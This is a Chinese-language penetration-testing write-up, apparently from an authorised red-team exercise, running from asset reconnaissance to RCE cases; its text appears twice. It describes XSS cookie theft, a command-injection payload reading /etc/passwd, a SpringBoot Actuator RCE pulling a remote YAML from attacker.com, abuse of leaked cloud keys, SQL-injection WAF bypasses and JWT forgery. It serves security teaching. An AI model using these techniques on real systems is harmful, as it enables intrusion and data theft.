某次内部行业渗透测试&攻防演练多个系统从资产打点到RCE漏洞
字数 4157 2025-10-01 14:05:44

内部行业渗透测试与攻防演练实战技术教学文档

0x1 前言

本文档基于一次有授权且漏洞已修复的内部渗透测试与攻防演练实战经验总结。目标是在一周周期内,通过对指定资产的系统化信息收集、打点渗透,最终获取多个系统的远程代码执行(RCE)权限。本文旨在详细阐述从资产发现到漏洞利用的完整方法论、工具链和实战案例。

0x2 攻防演练简介与核心要点

一、攻防演练定义
模拟真实攻击(红队)与防御(蓝队)的对抗活动,旨在评估并提升组织的安全防护、检测、响应和恢复能力。

二、关键步骤

  1. 规划与准备:明确目标、范围、规则,制定攻击与防御策略。
  2. 攻击模拟(红队):使用多种技术(网络渗透、社会工程、漏洞利用等)模拟攻击。
  3. 防御检测(蓝队):通过安全监控(IDS/IPS、日志分析、EDR等)发现和报告攻击行为。
  4. 攻防对抗:红蓝双方实时对抗,红队尝试突破,蓝队尝试阻断和溯源。
  5. 分析与总结:演练后复盘,分析安全弱点,制定改进计划。

三、常见得分与丢分项

  • 丢分项(蓝队)
    • 已知漏洞未及时修复。
    • 存在弱口令或默认凭证。
    • 安全配置不当(如不必要的服务开放)。
    • 未能检测到攻击行为。
    • 未能及时响应和阻止攻击。
  • 得分项(蓝队)
    • 及时修复漏洞并安装补丁。
    • 使用强密码并妥善管理凭证。
    • 正确的安全配置与权限控制。
    • 成功发现并报告攻击行为。
    • 采取有效的防御和响应措施。

0x3 指定资产收集与打点思路

一、信息收集/资产收集

  1. 企业信息查询:使用爱企查凤鸟等平台,通过公司名称搜集其备案域名、子公司、APP、小程序等资产。
  2. 备案信息查询:通过ICP/IP地址/域名信息备案管理系统获取备案号,再利用搜索引擎(或无影等工具的多引擎搜索功能)反查更多关联域名。
  3. 自动化工具爬取:使用ENscan等工具,输入公司名称,自动爬取网络空间中的相关资产信息。
  4. 汇总整理:将以上所有渠道获取的域名、IP进行合并与去重,形成初始资产清单。

二、子域名/IP网段收集

  1. 子域名发现
    • 灯塔ARL:将主域名提交至ARL进行自动化资产发现与扫描。
    • OneForAll:使用工具对主域名进行强力子域名枚举。
    • 空间引擎:使用FOFAHunterQuake等引擎,以域名、公司名、备案号为关键词进行搜索。
    • 去重:合并所有结果,去重后得到最终子域名列表。
  2. IP网段发现:将收集到的IP资产列表导入无影等工具的“资产整理”功能,或手动分析IP分布,归纳出目标公司的IP段,再通过FOFA等引擎(net="x.x.x.x/x")搜索该段内的其他资产。

三、资产打点

  1. 快速指纹识别与探活:使用无影Web指纹识别功能,批量导入资产,自动识别CMS、中间件、框架、前端技术等。
  2. 敏感文件扫描:利用灯塔ARL的敏感文件泄露扫描功能。关键:需自定义字典(修改ARL容器内 /app/dicts/file_top_2000.txt 文件),使用更全面的大字典以提高发现率。
  3. Google Hacking:对于访问报错或内容稀少的站点,使用site:domain.com等语法搜索,可能发现备份文件、测试页面、管理后台等隐藏路径。
  4. JS文件分析
    • 工具:强烈推荐Windows平台下的转子工具,能自动化爬取、分析JS文件,提取API接口、敏感信息(AK/SK、手机号、邮箱等)并进行漏洞分类。
    • 方法转子.exe --target https://example.com --scan=3。通过分析结果,追踪JS中泄露的接口进行未授权访问、敏感信息泄露等测试。

0x4 漏洞案例:从XSS到RCE

一、未授权接管管理员权限

  1. 发现XSS:目标官网客服聊天功能点存在存储型XSS,可插入恶意Payload。
  2. 窃取Cookie:构造Payload盗取客服人员的Cookie。
  3. 会话劫持:将窃取的Cookie替换到浏览器中,成功以admin管理员身份登录后台系统。

二、后台SSRF漏洞

  1. 功能点测试:在后台的“图标管理”等功能点测试SSRF。
  2. 漏洞验证:插入DNSlog地址,触发DNS查询,证实存在SSRF漏洞。

三、后台RCE漏洞

  1. 弱口令发现:通过信息收集发现另一后台登陆口,使用弱口令admin:Admin123进入。
  2. 命令执行测试:发现页面通过cmd参数传递指令,参数值经Base64编码。
  3. 漏洞利用:构造读取/etc/passwd的Payload,Base64编码后传递,成功读取文件内容,证实存在RCE。后续可执行系统命令获取服务器权限。

0x5 漏洞案例:SpringBoot Actuator RCE

环境:SpringBoot 1.x 或 2.x,Actuator端点未授权访问。
利用步骤

  1. 信息泄露:访问/env(1.x)或/actuator/env(2.x),获取环境属性。
  2. 设置恶意配置:POST方式请求/env(1.x)或/actuator/env(2.x),设置spring.cloud.bootstrap.location属性为一个远程YAML配置文件地址(如 http://attacker.com/exp.yml)。
  3. 刷新配置:请求/refresh(1.x)或/actuator/refresh(2.x)端点,触发应用加载远程配置。
  4. RCE实现:远程YAML文件内容包含利用SPEL表达式或JdbcRowSetImpl等类实现的恶意Payload,触发反序列化或表达式注入,实现RCE。
  5. 工具化:使用https://github.com/artsploit/yaml-payload生成恶意JAR包并自建HTTP服务托管YAML文件。

FOFA测绘语法app="SpringBoot" && (title="actuator" || body="actuator")

0x6 漏洞案例:阿里云存储桶接管

  1. 信息泄露:通过转子等工具分析JS文件,发现泄露的阿里云AccessKey(AK)和SecretKey(SK)。阿里云AK通常以LTAI开头。
  2. 权限验证:使用行云管家、CloudExplorer等云管理工具或AWS CLI/OSS Browser等官方工具,添加泄露的AK/SK。
  3. 接管结果:成功列出对象存储(OSS)桶内容,下载数十GB敏感内部文件。若权限足够(如RAM策略配置不当),可通过CloudFirewall(CF)等服务进行更高权限的操控。

0x7 漏洞案例:前台SQL注入

  1. 参数测试:对参数进行1/11/0测试,观察页面返回差异,判断是否存在布尔盲注。
  2. Payload构造:利用数据库函数进行注入。例如:if((length(database()))>1, 1, 0),通过返回结果判断条件真假。
  3. 绕过WAF:注意常见关键字替换绕过:
    • 空格 -> /**/, +, %0a
    • and -> &&
    • or -> ||
    • = -> like, rlike
    • union select -> union%a0select

0x8 漏洞案例:JWT漏洞导致越权

  1. 目标发现:通过天眼查找企业小程序/公众号,进入目标小程序。
  2. 抓包分析:BurpSuite抓取小程序流量,发现接口使用JWT Token。
  3. JWT分析:在jwt.io网站解码Token,了解结构(通常含role, userid, username等)。
  4. 漏洞利用
    • 弱密钥爆破:使用jwt-cracker等工具爆破出弱密钥(如123456)。
    • 伪造Token:使用密钥伪造高权限用户(如修改roleadmin)或其他用户的Token(修改useridusername)。
    • 签名验证缺失:若服务端未验证签名,可直接修改Payload后删除签名(alg改为none)。
  5. 越权访问:在请求中替换伪造的Token,实现未授权登录他人账户或提升至管理员权限。

0x9 隐私合规漏洞挖掘

一、简介
根据国家法律法规(如《个人信息保护法》),APP/小程序需合规处理用户信息。违反规定的行为可构成隐私合规漏洞。

二、常见违规点汇总

  1. 隐私政策与同意
    • 无隐私政策或用户协议。
    • 未明显提示、强制用户阅读、默认勾选同意。
    • 不同意则拒绝提供服务(应有二次确认)。
    • 政策内容与实际操作不符(如注销方式)。
  2. 权限与信息收集
    • 非必要收集信息(最小化原则)。
    • 索权未告知目的。
    • 频繁弹窗索权(48小时内不应重复)。
    • 拒绝权限后无法使用核心功能。
  3. 用户权利
    • 无账号注销功能或注销流程不合理。
    • 注销后未删除个人信息。
    • 无有效的用户投诉反馈渠道(需15日内处理)。
  4. 其他
    • 未提供个性化推荐关闭开关。
    • 开屏广告有误导点击的按钮。
    • 针对儿童的应用无特殊保护规则。
    • 隐私政策中敏感信息未加粗提示。
    • 存在政治性问题(如地区选择)。

三、参考法规

  • 《中华人民共和国个人信息保护法》
  • 《App违法违规收集使用个人信息行为认定方法》
  • 《常见类型移动互联网应用程序必要个人信息范围规定》

0x10 总结

本次渗透测试涵盖了完整链路:

  1. 资产发现:综合运用企业查询、备案反查、子域名爆破、空间引擎、自动化工具(ENscan, ARL, OneForAll)获取全面资产清单。
  2. 漏洞挖掘:通过敏感文件扫描、JS接口分析(转子)、Google Hacking等手段寻找入口点。
  3. 漏洞利用:成功利用XSS->越权->后台SSRF/RCE、SpringBoot Actuator RCE、云AK/SK泄露接管、SQL注入、JWT设计缺陷等多种漏洞取得成果。
  4. 拓展领域:关注新兴的隐私合规漏洞,利用法规要求发现潜在问题。

核心建议:渗透测试需系统化、自动化。重视JS文件分析、各类配置管理端点、第三方服务密钥的泄露。防守方应加强资产梳理、权限管控、默认安全配置、日志监控和应急响应。

内部行业渗透测试与攻防演练实战技术教学文档 0x1 前言 本文档基于一次有授权且漏洞已修复的内部渗透测试与攻防演练实战经验总结。目标是在一周周期内,通过对指定资产的系统化信息收集、打点渗透,最终获取多个系统的远程代码执行(RCE)权限。本文旨在详细阐述从资产发现到漏洞利用的完整方法论、工具链和实战案例。 0x2 攻防演练简介与核心要点 一、攻防演练定义 模拟真实攻击(红队)与防御(蓝队)的对抗活动,旨在评估并提升组织的安全防护、检测、响应和恢复能力。 二、关键步骤 规划与准备 :明确目标、范围、规则,制定攻击与防御策略。 攻击模拟(红队) :使用多种技术(网络渗透、社会工程、漏洞利用等)模拟攻击。 防御检测(蓝队) :通过安全监控(IDS/IPS、日志分析、EDR等)发现和报告攻击行为。 攻防对抗 :红蓝双方实时对抗,红队尝试突破,蓝队尝试阻断和溯源。 分析与总结 :演练后复盘,分析安全弱点,制定改进计划。 三、常见得分与丢分项 丢分项(蓝队) : 已知漏洞未及时修复。 存在弱口令或默认凭证。 安全配置不当(如不必要的服务开放)。 未能检测到攻击行为。 未能及时响应和阻止攻击。 得分项(蓝队) : 及时修复漏洞并安装补丁。 使用强密码并妥善管理凭证。 正确的安全配置与权限控制。 成功发现并报告攻击行为。 采取有效的防御和响应措施。 0x3 指定资产收集与打点思路 一、信息收集/资产收集 企业信息查询 :使用 爱企查 、 凤鸟 等平台,通过公司名称搜集其备案域名、子公司、APP、小程序等资产。 备案信息查询 :通过 ICP/IP地址/域名信息备案管理系统 获取备案号,再利用搜索引擎(或 无影 等工具的多引擎搜索功能)反查更多关联域名。 自动化工具爬取 :使用 ENscan 等工具,输入公司名称,自动爬取网络空间中的相关资产信息。 汇总整理 :将以上所有渠道获取的域名、IP进行合并与去重,形成初始资产清单。 二、子域名/IP网段收集 子域名发现 : 灯塔ARL :将主域名提交至ARL进行自动化资产发现与扫描。 OneForAll :使用工具对主域名进行强力子域名枚举。 空间引擎 :使用 FOFA 、 Hunter 、 Quake 等引擎,以域名、公司名、备案号为关键词进行搜索。 去重 :合并所有结果,去重后得到最终子域名列表。 IP网段发现 :将收集到的IP资产列表导入 无影 等工具的“资产整理”功能,或手动分析IP分布,归纳出目标公司的IP段,再通过FOFA等引擎( net="x.x.x.x/x" )搜索该段内的其他资产。 三、资产打点 快速指纹识别与探活 :使用 无影 的 Web指纹识别 功能,批量导入资产,自动识别CMS、中间件、框架、前端技术等。 敏感文件扫描 :利用 灯塔ARL 的敏感文件泄露扫描功能。 关键 :需自定义字典(修改ARL容器内 /app/dicts/file_top_2000.txt 文件),使用更全面的大字典以提高发现率。 Google Hacking :对于访问报错或内容稀少的站点,使用 site:domain.com 等语法搜索,可能发现备份文件、测试页面、管理后台等隐藏路径。 JS文件分析 : 工具 :强烈推荐Windows平台下的 转子 工具,能自动化爬取、分析JS文件,提取API接口、敏感信息(AK/SK、手机号、邮箱等)并进行漏洞分类。 方法 : 转子.exe --target https://example.com --scan=3 。通过分析结果,追踪JS中泄露的接口进行未授权访问、敏感信息泄露等测试。 0x4 漏洞案例:从XSS到RCE 一、未授权接管管理员权限 发现XSS :目标官网客服聊天功能点存在存储型XSS,可插入恶意Payload。 窃取Cookie :构造Payload盗取客服人员的Cookie。 会话劫持 :将窃取的Cookie替换到浏览器中,成功以 admin 管理员身份登录后台系统。 二、后台SSRF漏洞 功能点测试 :在后台的“图标管理”等功能点测试SSRF。 漏洞验证 :插入 DNSlog 地址,触发DNS查询,证实存在SSRF漏洞。 三、后台RCE漏洞 弱口令发现 :通过信息收集发现另一后台登陆口,使用弱口令 admin:Admin123 进入。 命令执行测试 :发现页面通过 cmd 参数传递指令,参数值经Base64编码。 漏洞利用 :构造读取 /etc/passwd 的Payload,Base64编码后传递,成功读取文件内容,证实存在RCE。后续可执行系统命令获取服务器权限。 0x5 漏洞案例:SpringBoot Actuator RCE 环境 :SpringBoot 1.x 或 2.x,Actuator端点未授权访问。 利用步骤 : 信息泄露 :访问 /env (1.x)或 /actuator/env (2.x),获取环境属性。 设置恶意配置 :POST方式请求 /env (1.x)或 /actuator/env (2.x),设置 spring.cloud.bootstrap.location 属性为一个远程YAML配置文件地址(如 http://attacker.com/exp.yml )。 刷新配置 :请求 /refresh (1.x)或 /actuator/refresh (2.x)端点,触发应用加载远程配置。 RCE实现 :远程YAML文件内容包含利用 SPEL 表达式或 JdbcRowSetImpl 等类实现的恶意Payload,触发反序列化或表达式注入,实现RCE。 工具化 :使用 https://github.com/artsploit/yaml-payload 生成恶意JAR包并自建HTTP服务托管YAML文件。 FOFA测绘语法 : app="SpringBoot" && (title="actuator" || body="actuator") 0x6 漏洞案例:阿里云存储桶接管 信息泄露 :通过 转子 等工具分析JS文件,发现泄露的阿里云AccessKey(AK)和SecretKey(SK)。阿里云AK通常以 LTAI 开头。 权限验证 :使用行云管家、CloudExplorer等云管理工具或AWS CLI/OSS Browser等官方工具,添加泄露的AK/SK。 接管结果 :成功列出对象存储(OSS)桶内容,下载数十GB敏感内部文件。若权限足够(如RAM策略配置不当),可通过CloudFirewall(CF)等服务进行更高权限的操控。 0x7 漏洞案例:前台SQL注入 参数测试 :对参数进行 1/1 和 1/0 测试,观察页面返回差异,判断是否存在布尔盲注。 Payload构造 :利用数据库函数进行注入。例如: if((length(database()))>1, 1, 0) ,通过返回结果判断条件真假。 绕过WAF :注意常见关键字替换绕过: 空格 -> /**/ , + , %0a and -> && or -> || = -> like , rlike union select -> union%a0select 0x8 漏洞案例:JWT漏洞导致越权 目标发现 :通过 天眼查 找企业小程序/公众号,进入目标小程序。 抓包分析 :BurpSuite抓取小程序流量,发现接口使用JWT Token。 JWT分析 :在 jwt.io 网站解码Token,了解结构(通常含 role , userid , username 等)。 漏洞利用 : 弱密钥爆破 :使用 jwt-cracker 等工具爆破出弱密钥(如 123456 )。 伪造Token :使用密钥伪造高权限用户(如修改 role 为 admin )或其他用户的Token(修改 userid 、 username )。 签名验证缺失 :若服务端未验证签名,可直接修改Payload后删除签名( alg 改为 none )。 越权访问 :在请求中替换伪造的Token,实现未授权登录他人账户或提升至管理员权限。 0x9 隐私合规漏洞挖掘 一、简介 根据国家法律法规(如《个人信息保护法》),APP/小程序需合规处理用户信息。违反规定的行为可构成隐私合规漏洞。 二、常见违规点汇总 隐私政策与同意 : 无隐私政策或用户协议。 未明显提示、强制用户阅读、默认勾选同意。 不同意则拒绝提供服务(应有二次确认)。 政策内容与实际操作不符(如注销方式)。 权限与信息收集 : 非必要收集信息(最小化原则)。 索权未告知目的。 频繁弹窗索权(48小时内不应重复)。 拒绝权限后无法使用核心功能。 用户权利 : 无账号注销功能或注销流程不合理。 注销后未删除个人信息。 无有效的用户投诉反馈渠道(需15日内处理)。 其他 : 未提供个性化推荐关闭开关。 开屏广告有误导点击的按钮。 针对儿童的应用无特殊保护规则。 隐私政策中敏感信息未加粗提示。 存在政治性问题(如地区选择)。 三、参考法规 《中华人民共和国个人信息保护法》 《App违法违规收集使用个人信息行为认定方法》 《常见类型移动互联网应用程序必要个人信息范围规定》 0x10 总结 本次渗透测试涵盖了完整链路: 资产发现 :综合运用企业查询、备案反查、子域名爆破、空间引擎、自动化工具(ENscan, ARL, OneForAll)获取全面资产清单。 漏洞挖掘 :通过敏感文件扫描、JS接口分析(转子)、Google Hacking等手段寻找入口点。 漏洞利用 :成功利用XSS->越权->后台SSRF/RCE、SpringBoot Actuator RCE、云AK/SK泄露接管、SQL注入、JWT设计缺陷等多种漏洞取得成果。 拓展领域 :关注新兴的隐私合规漏洞,利用法规要求发现潜在问题。 核心建议 :渗透测试需系统化、自动化。重视JS文件分析、各类配置管理端点、第三方服务密钥的泄露。防守方应加强资产梳理、权限管控、默认安全配置、日志监控和应急响应。